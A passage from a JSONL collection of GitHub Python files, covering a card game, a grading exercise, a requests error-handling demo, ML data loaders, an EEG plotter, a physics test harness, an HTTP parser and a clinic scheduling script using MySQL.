currentPlayer + 1\r\n            return currentPlayer\r\n    else:\r\n        print('Current turn is still active. Player ', currentPlayer, 'should play')\r\n        print('If player ', currentPlayer, 'has finished, type: \"END\"')\r\n        userInput = input('Type END to finish turn: ')\r\n        if userInput == 'END':\r\n            if currentPlayer == noOfPlayers:\r\n                currentPlayer = 0\r\n                return currentPlayer\r\n            else:\r\n                currentPlayer = currentPlayer + 1\r\n                return currentPlayer\r\n        else:\r\n            print('Player ', currentPlayer, \"'s turn\")\r\n            return currentPlayer\r\n
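\r\n# NOTE (added, illustrative): both wrap-around branches above could collapse\r\n# into a single modulo step, e.g.:\r\n#   currentPlayer = (currentPlayer + 1) % (noOfPlayers + 1)\r\n# since noOfPlayers stores the highest zero-based player index.\r\n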
\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Setting up player profiles: playerProfileSetUp\r\n\r\n\r\n# variable deck must be a list\r\ndef playerProfileSetUp(noOfPlayers, health, deck):\r\n    i=0\r\n    playersValues={}\r\n    while i <= noOfPlayers:\r\n        nickname = str(input('Choose your name, player... '))\r\n        playersValues[i] = {}\r\n        playersValues[i]['name'] = nickname\r\n        playersValues[i]['health']= health\r\n        playersValues[i]['active cards']= []\r\n        random.shuffle(deck)\r\n        for card in deck:\r\n            playersValues[i]['active cards'] += [card]\r\n        playersValues[i]['discarded cards']= []\r\n        i += 1\r\n    return playersValues\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Pick a random card from deck.\r\n\r\ndef pickRandom(deck):\r\n    cardToPick = random.choice(list(deck))\r\n    #deleted = 0\r\n    #for card in deck:\r\n    #    if card == cardToPick:\r\n    #        del card\r\n    deck.remove(cardToPick)\r\n    return cardToPick\r\n\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Update market\r\n\r\nmarket=[]\r\ndef updateMarket(market,deck):\r\n    while len(market)<5:\r\n        newCard = pickRandom(deck)\r\n        market = market + [newCard]\r\n    return market\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Draw 5 cards from personal deck-active cards. Gives output: \\\r\n# [newdraw, newactive, newdiscarded]\r\n# After using, set new card sets and print out 5 drawn cards.\r\n\r\ndef drawFive(activeCards, discardedCards):\r\n    if len(activeCards) >= 5:\r\n        newDraw = [activeCards[0:5]]\r\n        activeCards = activeCards[5:]\r\n        return [newDraw, activeCards, discardedCards]\r\n    else:\r\n        shuffle(discardedCards)\r\n        activeCards = activeCards + discardedCards\r\n        newDraw = [activeCards[0:5]]\r\n        activeCards = activeCards[5:]\r\n        discardedCards = []\r\n        return [newDraw, activeCards, discardedCards]\r\n
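\r\n# NOTE (added for clarity): drawFive returns [hand, active, discarded], where\r\n# hand is a one-element list wrapping the five drawn card names; that is why\r\n# the gameplay loop below iterates 'for m in pickedCards: for card in m:'.\r\n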
\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Check if game finished, if any health <= 0\r\n\r\ndef checkIfEnd(playersProfiles):\r\n    for player in playersProfiles:\r\n        if playersProfiles[player]['health'] <= 0:\r\n            loser = playersProfiles[player]['name']\r\n            gameEnd(loser)\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# End of the game function, when called, the game stops.\r\n\r\ndef gameEnd(loser):\r\n    print(playersProfiles)\r\n    print(loser, ' lost the game.')\r\n    print('GAME OVER')\r\n    gameEnded = True\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# GAMEPLAY\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# 1. Initial steps\r\n\r\n# Asks for a number of players, subtracts 1 to count from 0.\r\n\r\n#noOfPlayers = int(input('How many players? ')) - 1\r\nnoOfPlayers=1\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Asks for a value of health at the begining. Available values 20-100.\r\n\r\n#startingHealth = int(input('What is the starting value of health? (20-100) '))\r\n#while startingHealth <20 or startingHealth > 100:\r\n#    print('Incorrect value of starting health, try again.')\r\n#    startingHealth = int(input('What is the starting value of health? (20-100) '))\r\nstartingHealth=30\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Setting up player profiles\r\n\r\nplayersProfiles = playerProfileSetUp(noOfPlayers, startingHealth, starterDeckL)\r\nprint(playersProfiles)\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# Setting up market\r\nmarket = updateMarket(market,deckL)\r\nprint( 'Cards in the market: ', market)\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# 2. Gameplay loop\r\n\r\ngameEnded =False\r\ncurrentPlayer=0\r\nloserOfGame = None #track the loser so the final gameEnd call is safe when the game is quit early\r\nwhile gameEnded == False:\r\n    print(playersProfiles[currentPlayer]['name'], \"'s turn\" )\r\n    #draw once and unpack, so the hand and the updated piles stay consistent\r\n    pickedCards, playersProfiles[currentPlayer]['active cards'], playersProfiles[currentPlayer]['discarded cards'] = \\\r\n        drawFive(playersProfiles[currentPlayer]['active cards'], playersProfiles[currentPlayer]['discarded cards'])\r\n    print(pickedCards)\r\n\r\n    # Count gold\r\n    goldCount=0\r\n    for m in pickedCards:\r\n        for card in m:\r\n            if card in starterDeck:\r\n                goldCount += starterDeck[card]['gold']\r\n            else:\r\n                goldCount += saverDeck[card]['gold']\r\n    print('You have ', goldCount, ' gold to spend.')\r\n\r\n    print('Market:')\r\n    for card in market:\r\n        print(card, saverDeck[card])\r\n\r\n    print(market)\r\n    # Buying\r\n\r\n    cardToBuy = str(input('Which card do you want to buy? Type 0 if none. '))\r\n\r\n    while cardToBuy != '0':\r\n\r\n        if cardToBuy not in market:\r\n            print('Wrong input, try again.')\r\n            cardToBuy = str(input('Which card do you want to buy? Type 0 if none. '))\r\n        else:\r\n            price = saverDeck[cardToBuy]['cost']\r\n            print (\"card's price is\", price)\r\n            if int(price) <= goldCount:\r\n                print ('Enough money!')\r\n                market.remove(cardToBuy) #only take the card out of the market once the purchase succeeds\r\n                playersProfiles[currentPlayer]['discarded cards'] += [cardToBuy]\r\n                print(playersProfiles[currentPlayer]['discarded cards'])\r\n\r\n                print (playersProfiles[currentPlayer]['name'], 'has bought', cardToBuy)\r\n                goldCount = goldCount - int(price)\r\n                print ('You now have ', goldCount, ' gold to spend.')\r\n                cardToBuy = input('What card do you want to buy now? Type 0 if you have finished buying. ')\r\n            else:\r\n                print(\"You don't have enough gold to buy\", cardToBuy)\r\n                cardToBuy = input('Chose a different card or type in 0 if finished. ')\r\n
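\r\n    # NOTE (added, illustrative): the gold/damage/healing tallies in this loop\r\n    # could each be written as one comprehension, e.g.:\r\n    #   goldCount = sum((starterDeck.get(card) or saverDeck[card])['gold']\r\n    #                   for m in pickedCards for card in m)\r\n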
\r\n    # Count damage\r\n    damageCount=0\r\n    for m in pickedCards:\r\n        for card in m:\r\n            if card in starterDeck:\r\n                damageCount += starterDeck[card]['damage']\r\n            else:\r\n                damageCount += saverDeck[card]['damage']\r\n    print('You have ', damageCount, ' damage to use.')\r\n\r\n    # Print health of all players\r\n    i=0\r\n    while i <= noOfPlayers:\r\n        print(playersProfiles[i]['name'], 'is at', playersProfiles[i]['health'], 'health')\r\n        i += 1\r\n\r\n    # Use damage\r\n\r\n    i=0\r\n    while i <= noOfPlayers:\r\n        if i != currentPlayer:\r\n            print('How much damage for', playersProfiles[i]['name'], '?')\r\n            damageGiven = int(input('How much damage? '))\r\n\r\n            playersProfiles[i]['health']= playersProfiles[i]['health'] - damageGiven\r\n        i += 1\r\n\r\n\r\n    # Print health of all players\r\n    i=0\r\n    while i <= noOfPlayers:\r\n        print(playersProfiles[i]['name'], 'is at', playersProfiles[i]['health'], 'health')\r\n        i += 1\r\n\r\n\r\n    # Healing part\r\n    # Counting healing\r\n\r\n    healingCount=0\r\n    for m in pickedCards:\r\n        for card in m:\r\n            if card in starterDeck:\r\n                continue #starter cards have no healing, so leave the running total alone\r\n            else:\r\n                healingCount += saverDeck[card]['healing']\r\n    print('You have ', healingCount, ' healing to use.')\r\n    # Use healing\r\n    playersProfiles[currentPlayer]['health']= playersProfiles[currentPlayer]['health'] + healingCount\r\n\r\n\r\n    # End of turn\r\n    # print health\r\n    i=0\r\n    while i <= noOfPlayers:\r\n        print(playersProfiles[i]['name'], 'is at', playersProfiles[i]['health'], 'health')\r\n        i += 1\r\n\r\n    # update market\r\n    market = updateMarket(market,deckL)\r\n    print( 'Cards in the market: ', market)\r\n\r\n    # Check if anyone has lost\r\n    i=0\r\n    while i <= noOfPlayers:\r\n        if playersProfiles[i]['health'] <= 0: #damage can overshoot past zero, so check <= rather than ==\r\n            gameEnded=True\r\n            print('Player', playersProfiles[i]['name'], 'has lost.')\r\n            loserOfGame=str(playersProfiles[i]['name'])\r\n        i += 1\r\n\r\n    print('End of turn. ')\r\n    currentPlayer = changeTurn(currentPlayer, True) #pass the turn to the next player\r\n    quitGame = str(input('If you want to quit the game, type Q'))\r\n    if quitGame == 'Q':\r\n        gameEnded = True\r\n\r\n\r\nif loserOfGame is not None:\r\n    gameEnd(loserOfGame)\r\n\r\n\r\n\r\n","repo_name":"jules793/HeroRealms","sub_path":"herorealms5.py","file_name":"herorealms5.py","file_ext":"py","file_size_in_byte":12698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34844886692","text":"# -*- encoding: utf-8 -*-\n'''\n@File    :   task7.py\n@Time    :   2020/03/15 12:12:11\n@Author  :   xdbcb8 \n@Version :   1.0\n@Contact :   xdbcb8@qq.com\n@WebSite :   www.xdbcb8.com\n'''\n\n# here put the import lib\n\n'''\n7. Randomly generate the scores of 20 students and grade each score with a function:\n    A --> score >= 90\n    B --> score in [80, 90)\n    C --> score in [70, 80)\n    D --> score < 70\n'''\n\nimport random\ndef judge(scores):\n    levels = []\n    for score in scores:\n        if score >= 90:\n            levels.append('A')\n        elif score >= 80:\n            levels.append('B')\n        elif score >= 70:\n            levels.append('C')\n        else:\n            levels.append('D')\n    return levels\n\nscores = [random.randint(0,100) for _ in range(20)] #the task asks for 20 students\nlevels = judge(scores)\nprint(\"Scores and grades:\")\nfor i in range(len(scores)):\n    print(scores[i], \" \", levels[i])","repo_name":"zhongshiwei456/learngit","sub_path":"homework2/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"2957650946","text":"from flask import Flask\nimport requests\n\napp = Flask(__name__)\n\nurl = \"https://google.com1111\"\ntry:\n    # Make a request\n    response = requests.get(url)\n\n    # Check the response status code\n    if response.status_code == 200:\n        # Request was successful\n        print(\"Request succeeded\")\n    else:\n        # Request failed with an error status code\n        print(f\"Request failed with status code: {response.status_code}\")\n\nexcept requests.exceptions.ConnectionError as conne:\n    # Handle connection failures before the generic handler: ConnectionError\n    # is a subclass of RequestException and would otherwise never be reached\n    print(\"connection error\")\nexcept requests.exceptions.RequestException as e:\n    # Request encountered an exception\n    print(\"An error occurred during the request:\")\n    #print(type(e))  # Print the type of the exception\n    print(e)
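\n# NOTE (added, illustrative): except clauses are tried in order and\n# ConnectionError derives from RequestException:\n#   issubclass(requests.exceptions.ConnectionError,\n#              requests.exceptions.RequestException)  # True\n# so the more specific handler has to come first to ever run.\n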
","repo_name":"deepak2090/InterviewKickStart","sub_path":"requests_advanced/requestsadv.py","file_name":"requestsadv.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"35866562184","text":"from torch_geometric.datasets import TUDataset\nfrom torch_geometric.data import DataLoader\nimport pickle\nimport os\n\n\n\nclass GraphDataset(object):\n    \"\"\"Load a TUDataset (cached as a pickle) and build train/valid/test loaders.\n    \"\"\"\n    def __init__(self,av):\n        self.av = av\n        self.load_graph()\n        self.create_data_splits()\n\n    def load_graph(self): \n        fname = \"Datasets/\" + self.av.DATASET_NAME + \"_689_data1.pkl\"\n        print (fname)\n        if os.path.isfile(fname):\n            with open(fname, \"rb\") as f:\n                self.dataset = pickle.load(f)\n        else: \n            self.dataset = TUDataset(root=\".\", name=self.av.DATASET_NAME)\n\n            with open(fname,\"wb\") as f:\n                pickle.dump(self.dataset,f)\n\n    def create_data_splits(self):\n        self.num_total_data = len(self.dataset)\n        tr_idx_end = int(self.num_total_data * 0.7)\n        val_idx_end = int(self.num_total_data * 0.8)\n        self.num_val_data = val_idx_end - tr_idx_end\n        self.num_test_data = self.num_total_data - val_idx_end \n        self.loader_train = DataLoader(self.dataset[:tr_idx_end], batch_size=self.av.BATCH_SIZE, shuffle=True)\n        self.loader_valid = DataLoader(self.dataset[tr_idx_end:val_idx_end], batch_size=self.num_val_data, shuffle=True)\n        self.loader_test = DataLoader(self.dataset[val_idx_end:], batch_size=self.num_test_data, shuffle=False)\n\n    \n","repo_name":"Indradyumna/cs689Project","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70082111530","text":"import numpy as np \nfrom pylsl import StreamInlet, resolve_byprop\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport time\nimport utils\n\nclass Band:\n    Delta = 0\n    Theta = 1\n    Alpha = 2\n    Beta = 3\n\n\"\"\" EXPERIMENTAL PARAMETERS \"\"\"\n\nBUFFER_LENGTH = 5\nEPOCH_LENGTH = 1\nOVERLAP_LENGTH = 0.8\nSHIFT_LENGTH = EPOCH_LENGTH - OVERLAP_LENGTH\nINDEX_CHANNEL = [0]\n\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\nnScan=0\nt=[]\nsensor={}\nsensor['A']=[]\nsensor['B']=[]\nsensor['G']=[]\nsensor['T']=[]\nstart_time=time.time()\n\ndef animate(i, eeg_buffer, filter_state, n_win_test, band_buffer):\n\n    global t, start_time\n\n    \"\"\" 3.1 ACQUIRE DATA \"\"\"\n    eeg_data, timestamp = inlet.pull_chunk(timeout=1, max_samples=int(SHIFT_LENGTH * fs))\n    ch_data = np.array(eeg_data)[:, INDEX_CHANNEL]\n    eeg_buffer, filter_state = utils.update_buffer(eeg_buffer, ch_data, notch=True, filter_state=filter_state)\n\n    \"\"\" 3.2 COMPUTE BAND POWERS \"\"\"\n    data_epoch = utils.get_last_data(eeg_buffer, EPOCH_LENGTH * fs)\n    band_powers = utils.compute_band_powers(data_epoch, fs)\n\n    # Add x and y to lists\n    sensor['A'].append(band_powers[0])\n    sensor['B'].append(band_powers[1])\n    sensor['G'].append(band_powers[2])\n    sensor['T'].append(band_powers[3])\n    t.append(((time.time())-start_time))\n\n    # Limit x and y lists to the last 40 items\n    sensor['A']=sensor['A'][-40:]\n    sensor['B']=sensor['B'][-40:]\n    sensor['G']=sensor['G'][-40:]\n    sensor['T']=sensor['T'][-40:]\n    t=t[-40:]\n\n    # Draw x and y lists\n    ax.clear()\n    ax.plot(t, sensor['A'], color=\"blue\")\n    ax.plot(t, sensor['B'], color=\"red\")\n    ax.plot(t, sensor['G'], color=\"green\")\n    ax.plot(t, sensor['T'], color=\"black\")\n\n    # Format plot\n    plt.title('sensor')\n    plt.ylabel('data')\n    plt.xlabel('time')\n
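    # NOTE (added for clarity): the [-40:] slices above keep a rolling window\n    # of the last 40 band-power samples; collections.deque(maxlen=40) would be\n    # an equivalent alternative.\n    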
plt.ylim(-2,4)\n\n\nif __name__ == \"__main__\":\n\n \"\"\" 1. CONNECT TO EEG STREAM \"\"\"\n\n # Search and active LSL streams\n print('Looking for an EEG stream...')\n streams = resolve_byprop('type', 'EEG', timeout=2)\n if len(streams) == 0:\n raise RuntimeError('Can\\'t find EEG stream.')\n print(\"Start acquiring data\")\n inlet = StreamInlet(streams[0], max_chunklen=12)\n eeg_time_correction = inlet.time_correction()\n info = inlet.info()\n description = info.desc()\n fs = int(info.nominal_srate())\n\n \"\"\" 2. INITIALIZE BUFFERS \"\"\"\n eeg_buffer = np.zeros((int(fs * BUFFER_LENGTH), 1))\n filter_state = None # for use with the notch filter\n n_win_test = int(np.floor((BUFFER_LENGTH - EPOCH_LENGTH) / SHIFT_LENGTH + 1))\n band_buffer = np.zeros((n_win_test, 4))\n\n # Set up plot to call animate() function periodically\n ani = animation.FuncAnimation(fig, animate, fargs=(eeg_buffer, filter_state, n_win_test, band_buffer), interval=(1), save_count=50)\n plt.show()\n \n\n","repo_name":"Bagnis-Gabriele/Robotic-hand","sub_path":"test_code/muse_animate_graphic/animated graphic muse.py","file_name":"animated graphic muse.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"4618551050","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nsys.path.insert(0, os.pardir)\nsys.path.insert(0, os.path.join(os.pardir, 'openmoc'))\nfrom testing_harness import TestHarness\nfrom input_set import SimpleLatticeInput\nimport openmoc.process as process\n\n\nclass MeshReactionRateTallyTestHarness(TestHarness):\n \"\"\"An eigenvalue calculation with a mesh tally of the fission rates\n using the openmoc.process module.\"\"\"\n\n def __init__(self):\n super(MeshReactionRateTallyTestHarness, self).__init__()\n self.input_set = SimpleLatticeInput()\n\n # Change spacing to avoid having rays start on lattice planes\n # Those rays are problematic because they cross through fuel pins\n # parallelly to sector planes.\n self.spacing = 0.12\n\n def _run_openmoc(self):\n \"\"\"Run an OpenMOC eigenvalue calculation.\"\"\"\n super(MeshReactionRateTallyTestHarness, self)._run_openmoc()\n\n def _get_results(self, num_iters=True, keff=True, fluxes=True,\n num_fsrs=True, num_tracks=True, num_segments=True,\n hash_output=True):\n \"\"\"Digest info from the mesh tallies and return as a string.\"\"\"\n\n # Create OpenMOC Mesh on which to tally reaction rates\n mesh = process.Mesh()\n mesh.dimension = [4, 4]\n mesh.lower_left = [-2., -2.]\n mesh.upper_right = [2., 2.]\n mesh.width = [1., 1.]\n\n outstr = \"\"\n for rxn in ('fission', 'flux', 'total', 'nu-fission', 'scatter'):\n # Tally OpenMOC reaction rates on the Mesh\n rxn_rates = mesh.tally_reaction_rates_on_mesh(\n self.solver, rxn, volume='integrated')\n # Append reaction rates to the output string\n outstr += rxn.title() + ' Rate Mesh Tally\\n'\n rates = ['{0:12.6E}'.format(rate) for rate in rxn_rates.ravel()]\n outstr += '\\n'.join(rates) + '\\n'\n \n return outstr\n\n\nif __name__ == '__main__':\n harness = MeshReactionRateTallyTestHarness()\n harness.main()\n","repo_name":"mit-crpg/OpenMOC","sub_path":"tests/test_mesh_reaction_rate_tally/test_mesh_reaction_rate_tally.py","file_name":"test_mesh_reaction_rate_tally.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"53"} +{"seq_id":"73251035048","text":"from django.conf.urls import url\nfrom log_management import 
views\n\nurlpatterns = [\n    url(r\"^$\", views.index, name=\"index\"),\n    url(r\"^setlog/([a-zA-Z0-9._ -]+)/$\", views.set_log, name=\"set_log\"),\n    url(r\"^ajax/loginfo/$\", views.get_log_info, name=\"get_log_info\"),\n    url(r\"^ajax/checkFitness/$\", views.get_new_fitness, name=\"get_new_fitness\"),\n    url(r\"^ajax/fit/$\", views.fit, name=\"fit\"),\n]\n","repo_name":"bitsch/Mid-granular-analysis-tool-MasterThesis","sub_path":"WebProject/log_management/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9832946579","text":"class HTTPRequest:\n    def __init__(self, method=None, request_uri=None, query_string = None, http_version=None, headers=None, body=None):\n        self.method = method\n        self.request_uri = request_uri\n        self.query_string = query_string\n        self.http_version = http_version\n        if not headers:\n            headers = dict()\n        self.headers = headers\n        self.body = body\n\n    @staticmethod\n    def parse(client):\n        request = HTTPRequest()\n        request_file = client.makefile()\n        line = request_file.readline()\n        line_split = line.split(\" \")\n        request.method = line_split[0]\n        full_uri = line_split[1].split(\"?\")\n        request.request_uri = full_uri[0]\n        request.query_string = \"\" if len(full_uri) <= 1 else full_uri[1]\n        request.http_version = line_split[2]\n        line = request_file.readline()\n        while line != \"\\r\\n\":\n            line_split = line.split(\": \", 1) #split only on the first ': ' so header values may themselves contain colons\n            request.headers[line_split[0]] = line_split[1].strip()\n            line = request_file.readline()\n\n        if \"Content-Length\" in request.headers:\n            request.body = request_file.read(int(request.headers[\"Content-Length\"]))\n\n        request_file.close()\n        return request\n
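\n# NOTE (added, illustrative usage sketch -- assumes an accepted client socket):\n#   client, _ = server_socket.accept()\n#   req = HTTPRequest.parse(client)\n#   print(req.method, req.request_uri, req.query_string, req.headers)\n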
","repo_name":"oknalv/piollo","sub_path":"httprequest.py","file_name":"httprequest.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5497809876","text":"import os\nimport cv2\nimport yaml\nimport scipy.io\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n \nimport torch\nimport torch.nn as nn\nfrom torchvision import datasets\nfrom model import ft_net\n \ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\ndef preprocess(img):\n    img = cv2.resize(img,(224,224))\n    img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n    img = np.float32(img)/255.0\n    img[:,:,]-=[0.485, 0.456, 0.406]\n    img[:,:,]/=[0.229, 0.224, 0.225]\n    return img\n \ndef extract_feature(model, img):\n    img = preprocess(img)\n    img = torch.from_numpy(img.transpose(2,0,1))\n    img = img.unsqueeze(0).to(device)\n    with torch.no_grad():\n        outputs = model(img)\n    fnorm = torch.norm(outputs, p=2, dim=1, keepdim=True)\n    features = outputs.div(fnorm.expand_as(outputs))\n    return features\n \ndef load_model():\n    config_path = os.path.join('./model/ft_ResNet50/opts.yaml')\n    with open(config_path, 'r') as stream:\n        config = yaml.load(stream, Loader=yaml.FullLoader) # for the new pyyaml via 'conda install pyyaml'\n    save_path = os.path.join('./model/ft_ResNet50/net_59.pth')\n    model = ft_net(751)\n    model.load_state_dict(torch.load(save_path))\n    model.classifier.classifier = nn.Sequential()\n    model = model.eval()\n    return model.to(device)\n \ndef sort_img(feature, gf, gl):\n    query = feature.view(-1,1)\n    # print(query.shape)\n    score = torch.mm(gf,query)\n    score = score.squeeze(1).cpu()\n    score = score.numpy()\n    # predict index\n    index = np.argsort(score)  #from small to large\n    index = index[::-1]\n    junk_index = np.argwhere(gl==-1)\n    mask = np.in1d(index, junk_index, invert=True)\n    index = index[mask]\n    return index, score[index]\n \ndef sort_img_faiss(feature, gf, gl):\n    import faiss\n    # index = faiss.IndexFlatL2(512)\n    index = faiss.IndexFlatIP(512)\n    index.add(gf.contiguous().cpu().numpy())\n    D, I = index.search(feature.cpu().numpy(), 10)\n    # junk_index = np.argwhere(gl==-1)\n    # mask = np.in1d(I, junk_index, invert=True)\n    # I = I[mask]\n    return I.squeeze(),D.squeeze()\n \ndef imshow(path, title=None):\n    \"\"\"Imshow for Tensor.\"\"\"\n    im = plt.imread(path)\n    plt.imshow(im)\n    if title is not None:\n        plt.title(title)\n    plt.pause(0.001)  # pause a bit so that plots are updated\n \ndef demo(query_path = \"data/market1501/query/0001_c1s1_001051_00.jpg\"):\n    model = load_model()\n    img = cv2.imread(query_path)\n    feature = extract_feature(model, img)\n    result = scipy.io.loadmat('pytorch_result.mat')\n    gallery_feature = torch.FloatTensor(result['gallery_f'])\n    gallery_feature = gallery_feature.to(device)\n    gallery_label = result['gallery_label'][0]\n    try:\n        index,score = sort_img_faiss(feature,gallery_feature,gallery_label)\n    except Exception:\n        index, score = sort_img(feature,gallery_feature,gallery_label) \n    data_dir = 'data/market1501/pytorch'\n    image_datasets = datasets.ImageFolder(os.path.join(data_dir,\"gallery\"))\n    \n    try:\n        fig = plt.figure(figsize=(16,4))\n        ax = plt.subplot(1,11,1)\n        ax.axis('off')\n        imshow(query_path,'query')\n        for i in range(10):\n            ax = plt.subplot(1,11,i+2)\n            ax.axis('off')\n            img_path, _ = image_datasets.imgs[index[i]]\n            ax.set_title('%d:%.3f'%(i+1,score[i]), color='blue')\n            imshow(img_path)\n            print(img_path)\n    except RuntimeError:\n        for i in range(10):\n            img_path = image_datasets.imgs[index[i]]\n            print(img_path[0])\n        print('If you want to see the visualization of the ranking result, graphical user interface is needed.')\n    fig.savefig(\"query.png\")\n    \nif __name__==\"__main__\":\n    demo()\n    input()
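\n\n# NOTE (added, illustrative): faiss.IndexFlatIP ranks by inner product; because\n# extract_feature L2-normalises every feature vector, the inner product equals\n# cosine similarity, so IndexFlatIP can stand in for the explicit torch.mm\n# scoring done in sort_img.\n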
","repo_name":"HKUST-NISL/Grace_Attention_ReID","sub_path":"test_demo.py","file_name":"test_demo.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38596664656","text":"# The code that works perfectly is the one that \"DOES NOT CONTAIN MYSQL\".\r\n# This code is not 100% functional; I only posted it because I tried to add a database to it. It still has some reproduction errors.\r\n\r\nfrom datetime import datetime\r\nimport mysql.connector\r\n\r\n# Connect to the database\r\nconn = mysql.connector.connect(host=\"localhost\", user=\"root\", password=\"88465524\", database=\"clinica\")\r\n\r\n# Create a table to store the patients, if it does not exist\r\ncursor = conn.cursor()\r\ncursor.execute(''' CREATE TABLE IF NOT EXISTS pacientes ( nome VARCHAR(255), telefone VARCHAR(20) PRIMARY KEY, UNIQUE (telefone))''')\r\n\r\n# Storage list for the registered patients\r\nPacientesCadastrados = []\r\n\r\n# Storage list for the appointments\r\nAgendamentos = []\r\n\r\n# Patient registration\r\ndef CadastroPaciente():\r\n    global PacientesCadastrados\r\n\r\n    nome = input(\"Digite o nome do paciente: \")\r\n    if any(char.isdigit() for char in nome):\r\n        print(\"\\nOpção inválida. O nome do Paciente não pode conter números.\")\r\n        return\r\n    \r\n    \r\n    telefone = input(\"Digite o telefone do paciente: \")\r\n    cursor.execute(\"SELECT * FROM pacientes WHERE telefone = %s\", (telefone,))\r\n    paciente = cursor.fetchone()\r\n    if paciente:\r\n        print(\"Paciente já cadastrado!\")\r\n        return\r\n    \r\n\r\n    # Insert the patient into the database\r\n    cursor.execute(\"INSERT INTO pacientes (nome, telefone) VALUES (%s, %s)\", (nome, telefone))\r\n    conn.commit()\r\n    \r\n    print(\"Paciente cadastrado com sucesso!\")\r\n\r\n    # Refresh the list of registered patients\r\n    PacientesCadastrados = []\r\n    cursor.execute(\"SELECT * FROM pacientes\")\r\n    for row in cursor:\r\n\r\n        PacientesCadastrados.append({\"nome\": row[0], \"telefone\": row[1]})\r\n\r\n\r\n# Patient listing\r\ndef PacienteLista():\r\n    print(\"\\n============ Pacientes Cadastrados ============\")\r\n    cursor.execute(\"SELECT * FROM pacientes\")\r\n    contador = 1\r\n    for row in cursor:\r\n        print(f\"{contador}. Paciente: {row[0]}, Telefone: {row[1]}\") #number the entries so a patient can be picked by index in Consultas\r\n        contador += 1\r\n\r\n# Booking appointments\r\n\r\ndef Consultas():\r\n    if len(PacientesCadastrados) == 0:\r\n        print(\"Não á nenhum paciente cadastrado na clinica.\")\r\n        return\r\n    \r\n    PacienteLista()\r\n    NumeroPaciente = int(input(\"Digite o número do paciente: \"))\r\n    if NumeroPaciente < 1 or NumeroPaciente > len(PacientesCadastrados):\r\n        print(\"Número inválido.\")\r\n        return\r\n    \r\n    Paciente = PacientesCadastrados[NumeroPaciente - 1]\r\n    ConsultaDesejada = input(\"Digite a consulta Desejada: \")\r\n    DiaConsulta = input(\"Digite o dia desejado para o agendamento da Consulta (formato: dd/mm/aaaa): \")\r\n    HoraConsulta = input(\"Digite a Hora desejada: (formato: hh:mm): \")\r\n\r\n    DataHora = datetime.strptime(DiaConsulta + \" \" + HoraConsulta, \"%d/%m/%Y %H:%M\")\r\n    DataHoraAtual = datetime.now()\r\n\r\n    if DataHora < DataHoraAtual:\r\n        print(\"Não é possível agendar consultas retroativas.\")\r\n        return\r\n\r\n    for agendamento in Agendamentos:\r\n        DataHoraCadastrada = datetime.strptime(agendamento[\"Dia\"] + \" \" + agendamento[\"Hora\"], \"%d/%m/%Y %H:%M\")\r\n        if DataHora == DataHoraCadastrada:\r\n            print(\"Data e hora 